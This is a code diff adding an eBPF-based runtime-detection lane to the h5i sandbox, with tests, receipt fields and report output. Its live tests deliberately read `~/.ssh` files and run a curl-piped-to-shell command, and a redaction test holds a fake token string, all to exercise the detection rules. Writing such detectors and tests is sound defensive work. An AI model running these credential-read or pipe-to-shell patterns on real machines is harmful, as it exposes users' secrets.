+        \tfield:const char * filename;\toffset:24;\tsize:8;\tsigned:0;\n\
+        \tfield:int flags;\toffset:32;\tsize:8;\tsigned:0;\n";
+
+    const FORK_FORMAT: &str = "name: sched_process_fork\nformat:\n\
+        \tfield:unsigned short common_type;\toffset:0;\tsize:2;\tsigned:0;\n\
+        \tfield:char parent_comm[16];\toffset:8;\tsize:16;\tsigned:0;\n\
+        \tfield:pid_t parent_pid;\toffset:24;\tsize:4;\tsigned:1;\n\
+        \tfield:char child_comm[16];\toffset:28;\tsize:16;\tsigned:0;\n\
+        \tfield:pid_t child_pid;\toffset:44;\tsize:4;\tsigned:1;\n";
+
+    #[test]
+    fn field_offsets_parse_out_of_a_real_format_file() {
+        assert_eq!(parse_field(OPENAT_FORMAT, "__syscall_nr"), Some((8, 4)));
+        assert_eq!(parse_field(OPENAT_FORMAT, "filename"), Some((24, 8)));
+        assert_eq!(parse_field(OPENAT_FORMAT, "dfd"), Some((16, 8)));
+        assert_eq!(parse_field(OPENAT_FORMAT, "nonesuch"), None);
+    }
+
+    /// An array field's name has the `[16]` on it. Getting this wrong would
+    /// make the fork check silently unverifiable — the failure mode the check
+    /// exists to prevent.
+    #[test]
+    fn array_fields_parse_by_name_without_their_bounds() {
+        assert_eq!(parse_field(FORK_FORMAT, "parent_comm"), Some((8, 16)));
+        assert_eq!(parse_field(FORK_FORMAT, "parent_pid"), Some((24, 4)));
+        assert_eq!(parse_field(FORK_FORMAT, "child_pid"), Some((44, 4)));
+    }
+
+    /// The offsets in [`SCHED_FIELDS`] are what the probe's structs encode.
+    /// This is the check that would fail if somebody edited one and not the
+    /// other.
+    #[test]
+    fn the_probes_assumed_offsets_match_a_real_kernels() {
+        for (name, fields) in SCHED_FIELDS {
+            let text = match *name {
+                "sched_process_fork" => FORK_FORMAT,
+                _ => continue,
+            };
+            for (field, offset, size) in *fields {
+                assert_eq!(parse_field(text, field), Some((*offset, *size)), "{field}");
+            }
+        }
+    }
+
+    #[test]
+    fn the_wire_structs_are_the_size_the_probe_expects() {
+        assert_eq!(std::mem::size_of::<ConfigWire>(), 24);
+        assert_eq!(std::mem::size_of::<PrefixWire>(), 4 + PREFIX_LEN);
+    }
+
+    /// Every program in the C file must have a row in [`PROGRAMS`]. The
+    /// runtime check catches this too, but only on a host that can load; this
+    /// one catches it in CI.
+    #[test]
+    fn every_program_in_the_probe_is_in_the_attach_table() {
+        let src = include_str!("../bpf/h5i_detect.bpf.c");
+        let mut declared = Vec::new();
+        let mut lines = src.lines().peekable();
+        while let Some(line) = lines.next() {
+            let Some(rest) = line.trim().strip_prefix("SEC(\"tracepoint/") else {
+                continue;
+            };
+            let Some(section) = rest.split('"').next() else {
+                continue;
+            };
+            let Some((category, name)) = section.split_once('/') else {
+                continue;
+            };
+            let Some(func) = lines.peek().and_then(|l| {
+                l.trim()
+                    .strip_prefix("int ")
+                    .and_then(|s| s.split('(').next())
+            }) else {
+                continue;
+            };
+            declared.push((func.to_string(), category.to_string(), name.to_string()));
+        }
+        assert_eq!(
+            declared.len(),
+            PROGRAMS.len(),
+            "the probe declares {} tracepoint programs, the attach table has {}",
+            declared.len(),
+            PROGRAMS.len()
+        );
+        for (func, category, name) in &declared {
+            assert!(
+                PROGRAMS
+                    .iter()
+                    .any(|(p, c, n)| p == func && c == category && n == name),
+                "{func} ({category}:{name}) is in the probe but not in the attach table"
+            );
+        }
+    }
+}

--- a/crates/h5i-bpf/tests/live_attach.rs
+++ b/crates/h5i-bpf/tests/live_attach.rs
@@ -1,0 +1,182 @@
+//! The one test that needs a kernel.
+//!
+//! Loading a BPF program and attaching it to a tracepoint requires `CAP_BPF`
+//! and `CAP_PERFMON`, which no CI runner grants and which an ordinary
+//! development machine does not give a `cargo test`. So this suite **skips
+//! loudly** rather than failing, and prints exactly why — the same discipline
+//! the Lean DRT harness uses, and for the same reason: a test that silently
+//! passes on a host that could not run it is worse than one that is not there.
+//!
+//! To run it for real:
+//!
+//! ```text
+//! sudo -E env "PATH=$PATH" H5I_BPF_LIVE=1 \
+//!     cargo test -p h5i-bpf --test live_attach -- --nocapture
+//! ```
+//!
+//! `H5I_BPF_LIVE=1` is the opt-in. Without it the suite skips even as root,
+//! because loading programs into the running kernel is not something a bare
+//! `cargo test` should do to somebody's machine by surprise.
+
+use std::process::Command;
+
+use h5i_bpf::rules::RuleContext;
+use h5i_bpf::scope::Tier;
+use h5i_bpf::{DetectConfig, Watch};
+
+/// Why this host cannot run the live suite, or `None` when it can.
+fn skip_reason() -> Option<String> {
+    if std::env::var("H5I_BPF_LIVE").as_deref() != Ok("1") {
+        return Some(
+            "H5I_BPF_LIVE=1 not set (this suite loads BPF programs into the running kernel)"
+                .to_string(),
+        );
+    }
+    let caps = h5i_bpf::probe_host();
+    caps.unavailable_reason()
+}
+
+macro_rules! skip_unless_live {
+    () => {
+        if let Some(why) = skip_reason() {
+            eprintln!("SKIP: {why}");
+            return;
+        }
+    };
+}
+
+/// The end-to-end claim: start a session, run a command that trips a known
+/// rule, and find that rule in the block.
+///
+/// `openat` of a credential path is used rather than anything exotic, because
+/// it exercises the whole chain — the process-tree scope admitting a
+/// descendant, the in-kernel prefix filter letting the path through, the ring
+/// buffer, the decoder, and the rule.
+#[test]
+fn a_credential_read_by_a_child_reaches_the_receipt() {
+    skip_unless_live!();
+
+    let home = std::env::var("HOME").unwrap_or_else(|_| "/root".into());
+    let secret_dir = format!("{home}/.ssh");
+    let cfg = DetectConfig {
+        tier: Tier::Workspace,
+        context: RuleContext {
+            net_mode: "allow".into(),
+            workspace: std::env::current_dir()
+                .map(|p| p.display().to_string())
+                .unwrap_or_default(),
+            home: home.clone(),
+            ..Default::default()
+        },
+        prefixes: h5i_bpf::kernel_prefixes(&home, ""),
+        ..Default::default()
+    };
+
+    let watch = Watch::start(cfg);
+    assert!(
+        watch.is_live(),
+        "the probe should have attached: {:?}",
+        watch.refusal()
+    );
+
+    // A child, so the scope has to admit a descendant rather than h5i itself.
+    let _ = Command::new("/bin/sh")
+        .arg("-c")
+        .arg(format!("cat {secret_dir}/* >/dev/null 2>&1; true"))
+        .status();
+    // The reader polls on a 100ms cadence; give it one.
+    std::thread::sleep(std::time::Duration::from_millis(300));
+
+    let block = watch.finish();
+    eprintln!("{}", serde_json::to_string_pretty(&block).unwrap());
+
+    assert!(block.observed(), "{}", block.summary());
+    assert!(block.events_seen > 0, "no events at all: {}", block.summary());
+    assert!(
+        block.detections.iter().any(|d| d.rule == "secret.read"),
+        "expected secret.read, got: {:?}",
+        block.detections.iter().map(|d| &d.rule).collect::<Vec<_>>()
+    );
+}
+
+/// h5i's own threads must not be reported as the box. The probe's state
+/// machine is what makes this true, and it is the difference between a lane
+/// that reports on a box and one that reports on h5i.
+#[test]
+fn the_host_processs_own_activity_is_not_attributed_to_the_box() {
+    skip_unless_live!();
+
+    let cfg = DetectConfig {
+        tier: Tier::Workspace,
+        context: RuleContext {
+            net_mode: "allow".into(),
+            home: std::env::var("HOME").unwrap_or_default(),
+            ..Default::default()
+        },
+        prefixes: h5i_bpf::kernel_prefixes(&std::env::var("HOME").unwrap_or_default(), ""),
+        ..Default::default()
+    };
+    let watch = Watch::start(cfg);
+    assert!(watch.is_live(), "{:?}", watch.refusal());
+
+    // Do credential-shaped work in *this* process, spawning nothing.
+    let home = std::env::var("HOME").unwrap_or_else(|_| "/root".into());
+    for _ in 0..20 {
+        let _ = std::fs::read(format!("{home}/.ssh/config"));
+    }
+    std::thread::sleep(std::time::Duration::from_millis(300));
+
+    let block = watch.finish();
+    assert!(
+        !block.detections.iter().any(|d| d.rule == "secret.read"),
+        "h5i's own reads were attributed to the box: {:?}",
+        block.detections
+    );
+}
+
+/// An exec is the first thing a run does and the most valuable single event.
+#[test]
+fn a_childs_exec_is_captured_with_its_arguments() {
+    skip_unless_live!();
+
+    let cfg = DetectConfig {
+        tier: Tier::Process,
+        context: RuleContext {
+            net_mode: "allow".into(),
+            ..Default::default()
+        },
+        ..Default::default()
+    };
+    let watch = Watch::start(cfg);
+    assert!(watch.is_live(), "{:?}", watch.refusal());
+
+    let _ = Command::new("/usr/bin/env")
+        .args(["sh", "-c", "curl --version >/dev/null 2>&1 | sh; true"])
+        .status();
+    std::thread::sleep(std::time::Duration::from_millis(300));
+
+    let block = watch.finish();
+    eprintln!("{}", block.summary());
+    assert!(block.events_seen > 0);
+    assert_eq!(block.coverage, h5i_bpf::Coverage::Full);
+}
+
+/// Stopping must actually stop. A session dropped without `finish` still has
+/// to join its reader, or the next test inherits a thread polling a ring
+/// buffer whose maps have gone.
+#[test]
+fn dropping_a_session_stops_its_collector() {
+    skip_unless_live!();
+
+    let before = std::thread::available_parallelism().is_ok();
+    {
+        let watch = Watch::start(DetectConfig {
+            tier: Tier::Workspace,
+            ..Default::default()
+        });
+        assert!(watch.is_live(), "{:?}", watch.refusal());
+        drop(watch);
+    }
+    // Reaching here without hanging is the assertion: `Session::drop` joins.
+    assert!(before);
+}

--- a/crates/h5i-core/Cargo.toml
+++ b/crates/h5i-core/Cargo.toml
@@ -12,10 +12,20 @@ description = "h5i core domain library: disposable, confined development environ
 # tokio or the asset embedder — and never needs Node to compile.
 default = ["web"]
 web = ["dep:axum", "dep:tokio", "dep:rust-embed", "dep:mime_guess"]
+# `bpf` turns the runtime-detection lane from a set of types into a collector
+# (ROADMAP.md D1–D14). Off by default: `h5i-bpf` is a dependency either way, so
+# a receipt written by a build that had it on is always readable by one that
+# did not, but the eBPF loader and the compiled probe only come with this.
+bpf = ["h5i-bpf/load"]
 
 [dependencies]
 h5i-error = { path = "../h5i-error" }
 h5i-sandbox = { path = "../h5i-sandbox" }
+# The runtime-detection lane. `default-features = false` so the collector is
+# NOT pulled in unless this crate's own `bpf` feature asks for it: what is
+# unconditional here is the *evidence types*, which every build has to be able
+# to deserialize, because a receipt outlives the build that wrote it.
+h5i-bpf = { path = "../h5i-bpf", default-features = false }
 git2 = { workspace = true }
 serde = { workspace = true }
 serde_json = { workspace = true }

--- a/crates/h5i-core/src/env.rs
+++ b/crates/h5i-core/src/env.rs
@@ -5530,6 +5530,14 @@ pub fn run_remote(
         egress: result.egress.clone(),
         browser: None,
         share: None,
+        // Absent for the same reason `effective_digest` is: the
+        // runtime-detection lane watches processes on *this* kernel, and the
+        // run happened on another machine's. A block here would be a
+        // measurement of the wrong host, and an empty one would read as a
+        // quiet box. Extending the runner protocol to carry the far side's
+        // block is future work, and until it exists the honest answer is to
+        // say nothing rather than to say nothing happened.
+        runtime: None,
     };
     let captured = crate::receipt::append(&env_dir_path, input, &raw)?;
     m.captures.push(captured.id.clone());
@@ -5703,7 +5711,31 @@ fn run_inner(
         Some("running".into()),
         None,
     )?;
+    // The kernel-observed lane, started BEFORE the payload is spawned so the
+    // payload's own `execve` is the first thing it sees (ROADMAP.md D6). A
+    // refusal here is fatal only when the profile said `require = true`.
+    let watch = match start_watch(&policy, h5i_root, &work) {
+        Ok(w) => w,
+        Err(e) => {
+            let _ = protected_hook_configs.finish();
+            set_status(
+                repo,
+                h5i_root,
+                m,
+                ST_IDLE,
+                "status",
+                Some("idle (refused: unwatched)".into()),
+                None,
+            )?;
+            return Err(e);
+        }
+    };
     let result = sandbox::run_with_env(&policy, &work, argv, &injected_env);
+    // Stopped before anything else touches the box, so the block describes the
+    // command and not the bookkeeping that follows it — the browser drain
+    // below runs `sandbox::run_with_env` again, and its syscalls are h5i's
+    // work, not the box's.
+    let runtime_evidence = finish_watch(watch);
     // Whatever happened, leave the running state before propagating errors.
     let outcome = match result {
         Ok(o) => o,
@@ -5832,6 +5864,11 @@ fn run_inner(
         // Not a share. That lane is written by `h5i-share`, which sits above
         // this crate.
         share: None,
+        // Kernel observed. Absent when the profile did not ask to be watched;
+        // present with its reason when it asked and the probe could not
+        // attach, because a missing block and a quiet box must never look the
+        // same.
+        runtime: runtime_evidence,
     };
     let captured = crate::receipt::append(&env_dir(h5i_root, &m.agent, &m.slug), input, &raw)?;
     let capture_id = captured.id.clone();
@@ -6155,6 +6192,28 @@ pub fn shell(
     // No managed-settings injection: the in-box hook it carried rewrote agent
     // commands into `h5i capture run`, which no longer exists. The container
     // tee shim is the observation floor, and it needs no agent cooperation.
+    // Same lane, same ordering, for the interactive path. An interactive
+    // session is where an agent does the most unobserved work — the tee shim
+    // only sees commands a cooperating shell reported — so this is where a
+    // kernel-observed second opinion is worth the most.
+    let watch = match start_watch(&policy, h5i_root, &work) {
+        Ok(w) => w,
+        Err(e) => {
+            let _ = protected_hook_configs.finish();
+            if !readonly {
+                set_status(
+                    repo,
+                    h5i_root,
+                    m,
+                    ST_IDLE,
+                    "status",
+                    Some("idle (refused: unwatched)".into()),
+                    None,
+                )?;
+            }
+            return Err(e);
+        }
+    };
     let session = match sandbox::run_interactive(&policy, &work, &argv, &injected_env, None) {
         Ok(outcome) => outcome,
         Err(e) => {
@@ -6173,6 +6232,7 @@ pub fn shell(
             return Err(e);
         }
     };
+    let runtime_evidence = finish_watch(watch);
     let exit_code = session.exit_code;
     if let Err(e) = protected_hook_configs.finish() {
         if !readonly {
@@ -6259,6 +6319,23 @@ pub fn shell(
         .map(|eg| format!(" egress={}ok/{}denied", eg.allowed, eg.denied))
         .unwrap_or_default();
 
+    // What the kernel saw during the session, as its own record. A session is
+    // one shell and many commands, so the block is a summary of the whole
+    // session rather than of any one of them — which is exactly what makes it
+    // useful next to the tee shim's per-command records, and exactly why it is
+    // a separate record instead of being folded into one of theirs.
+    let runtime_note = match runtime_evidence {
+        Some(ev) => {
+            let note = format!(" runtime={}", ev.summary());
+            match capture_shell_runtime(h5i_root, m, &work, ev, exit_code) {
+                Ok(id) => m.captures.push(id),
+                Err(e) => eprintln!("warning: shell runtime capture failed: {e}"),
+            }
+            note
+        }
+        None => String::new(),
+    };
+
     let safe_cmd = crate::secrets::redact_text(&argv.join(" "));
     let observed_note = if observed > 0 {
         format!(" observed={observed}")
@@ -6272,7 +6349,7 @@ pub fn shell(
         ST_IDLE,
         "shell",
         Some(format!(
-            "interactive cmd=`{safe_cmd}` exit={exit_code}{observed_note}{egress_note}"
+            "interactive cmd=`{safe_cmd}` exit={exit_code}{observed_note}{egress_note}{runtime_note}"
         )),
         egress_capture,
     )?;
@@ -6304,6 +6381,168 @@ pub fn shell(
         )?;
     }
     Ok(exit_code)
+}
+
+// ─── runtime detection: the kernel-observed lane (ROADMAP.md D1–D14) ────────
+
+/// Build the collector's configuration from a resolved policy, or `None` when
+/// the profile did not ask to be watched.
+///
+/// Everything the rules need is derived from the policy that is actually in
+/// force, never from a global idea of what is suspicious: a box that was
+/// *granted* `unix_sockets` is not reported for using them, and a box with an
+/// unrestricted network is not reported for using it.
+fn detect_config(
+    policy: &crate::sandbox_policy::ResolvedPolicy,
+    h5i_root: &Path,
+    work: &Path,
+) -> Option<h5i_bpf::DetectConfig> {
+    let d = &policy.profile.detect;
+    if !d.enabled {
+        return None;
+    }
+    // `NetMode` is `deny|host`; the third state a rule cares about — "there is
+    // an allowlist" — is the profile declaring egress hosts, which is what
+    // puts a CONNECT proxy in front of the box.
+    let net_mode = if policy.profile.scopes_egress() {
+        "proxy"
+    } else {
+        match policy.profile.net_mode {
+            crate::sandbox_policy::NetMode::Deny => "deny",
+            crate::sandbox_policy::NetMode::Host => "allow",
+        }
+    };
+    // The box's home, which on every kernel tier is this user's: `HOME` is in
+    // the default `env.pass` and no tier below `container` gives the box one of
+    // its own. Empty when unset, and `kernel_prefixes` then contributes no
+    // home-relative prefixes rather than watching `/.ssh`, which is a real path
+    // and not the one anybody meant.
+    let home = std::env::var("HOME").unwrap_or_default();
+    let control_dir = h5i_root.display().to_string();
+
+    let mut cfg = h5i_bpf::DetectConfig {
+        tier: h5i_bpf::Tier::parse(policy.claim.as_str()),
+        buffer_kb: d.buffer_kb,
+        rules: d.rules.clone(),
+        context: h5i_bpf::RuleContext {
+            net_mode: net_mode.to_string(),
+            unix_sockets: policy.profile.unix_sockets,
+            workspace: work.display().to_string(),
+            home: home.clone(),
+            control_dir: control_dir.clone(),
+            // The addresses a proxied box is *supposed* to dial. Loopback is
+            // already exempt in the rule itself, and every proxy h5i runs binds
+            // loopback, so this stays empty on the tiers this lane covers
+            // fully. It exists for the container tier, whose proxy is reached
+            // at a gateway address — and that tier is `partial` for other
+            // reasons anyway.
+            proxy_peers: Vec::new(),
+            enabled: Default::default(),
+        },
+        prefixes: h5i_bpf::kernel_prefixes(&home, &control_dir),
+        open_all: false,
+    };
+    // Resolve here as well as inside `Watch::start`, so `context.enabled` is
+    // populated for callers that inspect the config (and so `want_dotenv` is
+    // answered from the resolved set rather than the selector strings).
+    let _ = cfg.resolve();
+    Some(cfg)
+}
+
+/// Start watching a run.
+///
+/// `Ok(None)` means the profile did not ask. `Err` means it asked with
+/// `require = true` and the probe could not attach — the run is refused rather
+/// than performed unwatched, which is the whole point of that switch.
+fn start_watch(
+    policy: &crate::sandbox_policy::ResolvedPolicy,
+    h5i_root: &Path,
+    work: &Path,
+) -> Result<Option<h5i_bpf::Watch>, H5iError> {
+    let Some(cfg) = detect_config(policy, h5i_root, work) else {
+        return Ok(None);
+    };
+    let watch = h5i_bpf::Watch::start(cfg);
+    if !watch.is_live() {
+        let why = watch.refusal().unwrap_or("no reason given").to_string();
+        if policy.profile.detect.require {
+            return Err(H5iError::Metadata(format!(
+                "this box's profile sets `[detect] require = true`, and the runtime-detection \
+                 probe could not attach: {why}\n           \
+                 Fix the cause above, or set `require = false` in `[profile.{}.detect]` to run \
+                 unwatched (the receipt will say so).",
+                policy.profile.name
+            )));
+        }
+        // Not fatal, and not silent either: the block that reaches the receipt
+        // carries this same reason, so the run is recorded as unwatched rather
+        // than as quiet.
+        eprintln!("note: runtime detection unavailable — {why}");
+    }
+    Ok(Some(watch))
+}
+
+/// Stop watching. `None` when nothing was.
+fn finish_watch(watch: Option<h5i_bpf::Watch>) -> Option<h5i_bpf::RuntimeEvidence> {
+    watch.map(|w| w.finish())
+}
+
+/// Persist what the kernel-observed lane saw during an interactive session.
+///
+/// Its own record rather than a field on somebody else's, because the thing it
+/// describes is the *session*: a shell runs many commands, the tee shim writes
+/// one record per command it managed to see, and this is the one observer that
+/// covers the gaps between them. Written even when nothing fired — a watched
+/// session with no detections is a result, and it is a different result from a
+/// session nobody watched.
+fn capture_shell_runtime(
+    h5i_root: &Path,
+    m: &EnvManifest,
+    work: &Path,
+    runtime: h5i_bpf::RuntimeEvidence,
+    exit_code: i32,
+) -> Result<String, H5iError> {
+    let mut raw = format!("runtime detection ({}): {}\n", runtime.lane, runtime.summary());
+    raw.push_str(&format!(
+        "scope={} coverage={} seen={} lost={} filtered={}\n",
+        runtime.scope,
+        runtime.coverage.as_str(),
+        runtime.events_seen,
+        runtime.events_lost,
+        runtime.events_filtered
+    ));
+    if let Some(why) = &runtime.coverage_reason {
+        raw.push_str(&format!("note: {why}\n"));
+    }
+    for d in &runtime.detections {
+        raw.push_str(&format!(
+            "\n[{}] {} — {} ({} match{})\n",
+            d.severity.as_str(),
+            d.rule,
+            d.title,
+            d.count,
+            if d.count == 1 { "" } else { "es" }
+        ));
+        for ex in &d.examples {
+            raw.push_str(&format!("    {ex}\n"));
+        }
+        if d.examples_truncated {
+            raw.push_str("    …\n");
+        }
+    }
+    let input = crate::receipt::RecordInput {
+        env_id: m.id.clone(),
+        policy_digest: Some(m.policy_digest.clone()),
+        effective_digest: effective_digest_of(&m.dir(h5i_root)),
+        fs_overlap: fs_overlap_with_boxes(h5i_root, m),
+        source: "host-env-shell".into(),
+        cmd: Some(format!("env shell {}", m.id)),
+        cwd: Some(work.display().to_string()),
+        exit_code: Some(exit_code),
+        runtime: Some(runtime),
+        ..Default::default()
+    };
+    Ok(crate::receipt::append(&env_dir(h5i_root, &m.agent, &m.slug), input, raw.as_bytes())?.id)
 }
 
 /// Persist an interactive session's egress tally as an env-tagged capture. The
@@ -7419,6 +7658,44 @@ pub fn status_report(repo: &Repository, h5i_root: &Path, m: &EnvManifest) -> Str
         }
         if !p.tools.is_empty() {
             out.push_str(&format!("  tools    : {}\n", p.tools.join(", ")));
+        }
+        // The runtime-detection lane, and — the part that matters — whether
+        // this host can actually deliver it. A profile that says
+        // `enabled = true` on a machine with no `CAP_BPF` is watching nothing,
+        // and a status page that printed only the profile's intent would be
+        // the exact "reads like enforcement, enforces nothing" failure this
+        // product keeps finding in itself.
+        if p.detect.enabled {
+            let caps = crate::bpf::probe_host();
+            out.push_str(&format!(
+                "  detect   : rules={} buffer={}KiB{}\n",
+                p.detect.rules.join(","),
+                p.detect.buffer_kb,
+                if p.detect.require {
+                    " require=true"
+                } else {
+                    ""
+                }
+            ));
+            match caps.unavailable_reason() {
+                None => {
+                    let (cov, why) = crate::bpf::Tier::parse(policy.claim.as_str()).coverage();
+                    out.push_str(&format!(
+                        "             kernel-observed, coverage={} on the {} tier{}\n",
+                        cov.as_str(),
+                        policy.claim.as_str(),
+                        why.map(|w| format!(" — {w}")).unwrap_or_default()
+                    ));
+                }
+                Some(why) => out.push_str(&format!(
+                    "             NOT watching on this host — {}{}\n",
+                    clean(&why),
+                    caps.fix
+                        .as_deref()
+                        .map(|f| format!("\n             fix: {f}"))
+                        .unwrap_or_default()
+                )),
+            }
         }
         // Named, not implied: these are held out of `diff`, `propose` and the
         // exported patch, and a reviewer should see that from the status page

--- a/crates/h5i-core/src/export.rs
+++ b/crates/h5i-core/src/export.rs
@@ -459,6 +459,86 @@ fn report(
         }
     }
 
+    // What the kernel saw. Placed above the agent's proposal for the same
+    // reason the browser section is: it is the part of the report the thing
+    // being reviewed could not write.
+    let watched: Vec<(&crate::receipt::ExecRecord, &h5i_bpf::RuntimeEvidence)> = records
+        .iter()
+        .filter_map(|r| r.runtime.as_ref().map(|rt| (r, rt)))
+        .collect();
+    if !watched.is_empty() {
+        out.push_str("\n## What the kernel saw\n\n");
+        let unobserved = watched.iter().filter(|(_, rt)| !rt.observed()).count();
+        let detections: Vec<_> = watched
+            .iter()
+            .filter(|(_, rt)| !rt.detections.is_empty())
+            .collect();
+
+        if detections.is_empty() && unobserved == 0 {
+            let seen: u64 = watched.iter().map(|(_, rt)| rt.events_seen).sum();
+            out.push_str(&format!(
+                "{} run(s) were watched from the kernel — {seen} syscall event(s) — and no \
+                 signature fired. This says nothing about behaviour no signature models; \
+                 `h5i box detect rules` lists what was looked for.\n",
+                watched.len()
+            ));
+        } else {
+            out.push_str(
+                "Observed by an eBPF collector in the kernel, not reported by the box. Each \
+                 line is a signature that fired, with an example of what tripped it.\n\n",
+            );
+            for (r, rt) in &detections {
+                out.push_str(&format!(
+                    "- {} ({}) — {}\n",
+                    md_code(&crate::redact::sanitize_display(
+                        r.cmd.as_deref().unwrap_or("run")
+                    )),
+                    r.timestamp,
+                    md_escape(&crate::redact::sanitize_display(&rt.summary()))
+                ));
+                for d in &rt.detections {
+                    out.push_str(&format!(
+                        "  - **{}** `{}` — {} (×{})\n",
+                        d.severity.as_str(),
+                        d.rule,
+                        md_escape(&crate::redact::sanitize_display(&d.title)),
+                        d.count
+                    ));
+                    for ex in &d.examples {
+                        out.push_str(&format!(
+                            "    - {}\n",
+                            md_escape(&crate::redact::sanitize_display(ex))
+                        ));
+                    }
+                }
+            }
+        }
+
+        // "Nothing was looked at" is a different claim from "nothing was
+        // wrong". Same rule as the browser section above, and it matters more
+        // here: this lane is the one a reader is most likely to take as
+        // complete.
+        if unobserved > 0 {
+            out.push_str(&format!(
+                "\n_{unobserved} run(s) carry a runtime block that observed nothing:_\n"
+            ));
+            for (r, rt) in watched.iter().filter(|(_, rt)| !rt.observed()) {
+                out.push_str(&format!(
+                    "- {} — {}\n",
+                    r.timestamp,
+                    md_escape(&crate::redact::sanitize_display(&rt.summary()))
+                ));
+            }
+        }
+        let lost: u64 = watched.iter().map(|(_, rt)| rt.events_lost).sum();
+        if lost > 0 {
+            out.push_str(&format!(
+                "\n_{lost} event(s) were dropped before they could be examined, so the list \
+                 above is a lower bound._\n"
+            ));
+        }
+    }
+
     // Who was at the controls. A patch produced with a human driving the
     // browser is a different artifact from one an agent produced alone, and a
     // reviewer should not have to infer which this was.
@@ -747,6 +827,7 @@ mod tests {
             egress: None,
             browser,
             share: None,
+            runtime: None,
             redactions: Vec::new(),
             raw_oid: "sha256:0".into(),
             raw_size: 0,

--- a/crates/h5i-core/src/lib.rs
+++ b/crates/h5i-core/src/lib.rs
@@ -61,3 +61,8 @@ pub use h5i_sandbox::fs_authority;
 /// from the Linux job.
 #[cfg(unix)]
 pub use h5i_sandbox::seatbelt;
+/// The runtime-detection lane (ROADMAP.md D1–D14). Re-exported unconditionally
+/// — every build has to be able to read a receipt written by one that had the
+/// collector — while the collector itself is behind this crate's `bpf`
+/// feature.
+pub use h5i_bpf as bpf;

--- a/crates/h5i-core/src/receipt.rs
+++ b/crates/h5i-core/src/receipt.rs
@@ -198,6 +198,18 @@ pub struct ExecRecord {
     /// h5i owned both ends of the bridge and the box supplied none of it.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub share: Option<ShareEvidence>,
+    /// What the kernel saw, when the runtime-detection lane was watching
+    /// (ROADMAP.md D10).
+    ///
+    /// A second observer of the same command, in its own lane. `source` above
+    /// stays `host-env-run`, deliberately: the record is *about the command*,
+    /// and this is a different observer of that command rather than a
+    /// different record. Present even when the detector could not attach — the
+    /// block then carries the reason — because a missing block and a quiet box
+    /// would otherwise look identical, which is the confusion this lane exists
+    /// to remove.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub runtime: Option<h5i_bpf::RuntimeEvidence>,
     /// Secret rules that fired while redacting, by rule id.
     #[serde(default, skip_serializing_if = "Vec::is_empty")]
     pub redactions: Vec<String>,
@@ -232,6 +244,7 @@ pub struct RecordInput {
     pub egress: Option<EgressSummary>,
     pub browser: Option<BrowserEvidence>,
     pub share: Option<ShareEvidence>,
+    pub runtime: Option<h5i_bpf::RuntimeEvidence>,
 }
 
 /// Scrub every string a page supplied. A console line is a place a token turns
@@ -248,6 +261,24 @@ fn redact_browser_evidence(mut b: BrowserEvidence) -> BrowserEvidence {
     scrub(&mut b.errors);
     scrub(&mut b.failed_requests);
     b
+}
+
+/// Scrub the exemplars a detection carries.
+///
+/// The rules engine has already sanitised these for *terminal control
+/// sequences* — that is about rendering. This is the other half: a secret that
+/// happened to be in a path or an `argv[1]` must not reach `refs/h5i/objects`,
+/// and the receipt's own pattern-based redaction is the thing that decides
+/// what a secret looks like.
+fn redact_runtime_evidence(
+    mut r: h5i_bpf::RuntimeEvidence,
+) -> h5i_bpf::RuntimeEvidence {
+    for d in &mut r.detections {
+        for e in &mut d.examples {
+            *e = crate::secrets::redact_text(e);
+        }
+    }
+    r
 }
 
 fn log_path(env_dir: &Path) -> PathBuf {
@@ -416,6 +447,11 @@ pub fn append(env_dir: &Path, input: RecordInput, raw: &[u8]) -> Result<ExecReco
         // Host observed, and every field is a number or one of two known
         // transport strings, so there is nothing here for the scrub to reach.
         share: input.share,
+        // Kernel observed, but the exemplars inside it are *paths and command
+        // lines a box chose*, so they get the same scrub as the command and
+        // the payload. A credential passed as an argument reaches this lane
+        // exactly as readily as it reaches the others.
+        runtime: input.runtime.map(redact_runtime_evidence),
         redactions,
         raw_oid: format!("sha256:{digest}"),
         raw_size: stored.len() as u64,
@@ -671,6 +707,28 @@ pub fn render(rec: &ExecRecord, raw: &[u8]) -> String {
                 .chain(b.failed_requests.iter())
             {
                 out.push_str(&format!("           · {}\n", clean(line)));
+            }
+        }
+    }
+    if let Some(rt) = &rec.runtime {
+        out.push_str(&format!("  runtime  : {}\n", clean(&rt.summary())));
+        // The detections, worst first, with their exemplars. Same argument as
+        // the browser lines above: a count says something happened, the line
+        // says what — and here the line is the difference between "a rule
+        // fired" and "it read ~/.aws/credentials".
+        for d in &rt.detections {
+            out.push_str(&format!(
+                "           [{}] {} — {} ×{}\n",
+                d.severity.as_str(),
+                clean(&d.rule),
+                clean(&d.title),
+                d.count
+            ));
+            for ex in &d.examples {
+                out.push_str(&format!("             · {}\n", clean(ex)));
+            }
+            if d.examples_truncated {
+                out.push_str("             · …\n");
             }
         }
     }
@@ -1007,4 +1065,97 @@ mod tests {
         let unknown = find(td.path(), "zzzzzzzz").unwrap_err().to_string();
         assert!(unknown.contains("no object matches"), "{unknown}");
     }
+    /// The block must survive a round trip through the log, and its exemplars
+    /// must be scrubbed on the way in: a path or an `argv[1]` a box chose can
+    /// carry a credential exactly as readily as a command line can.
+    #[test]
+    fn a_runtime_block_is_stored_redacted_and_read_back() {
+        let dir = TempDir::new().unwrap();
+        let mut input = input();
+        input.runtime = Some(h5i_bpf::RuntimeEvidence {
+            lane: h5i_bpf::evidence::LANE.into(),
+            scope: "pidtree".into(),
+            coverage: h5i_bpf::Coverage::Full,
+            coverage_reason: None,
+            events_seen: 12,
+            events_lost: 0,
+            events_filtered: 900,
+            detections: vec![h5i_bpf::Detection {
+                rule: "secret.read".into(),
+                family: "secret".into(),
+                severity: h5i_bpf::Severity::Alert,
+                title: "opened a credential file".into(),
+                count: 2,
+                first_ns: 1,
+                last_ns: 9,
+                examples: vec![format!(
+                    "open /h/.ssh/k --token=sk-ant-api03-{}",
+                    "S3CRETVALUE".repeat(9)
+                )],
+                examples_truncated: false,
+            }],
+            unavailable: None,
+        });
+        let rec = append(dir.path(), input, b"out").unwrap();
+        let stored = &rec.runtime.as_ref().unwrap().detections[0].examples[0];
+        assert!(!stored.contains("S3CRETVALUE"), "{stored}");
+
+        let back = find(dir.path(), &rec.id).unwrap();
+        let rt = back.runtime.expect("the block must survive the log");
+        assert_eq!(rt.events_seen, 12);
+        assert_eq!(rt.detections.len(), 1);
+        assert!(rt.observed());
+    }
+
+    /// A record written before this field existed must still read.
+    #[test]
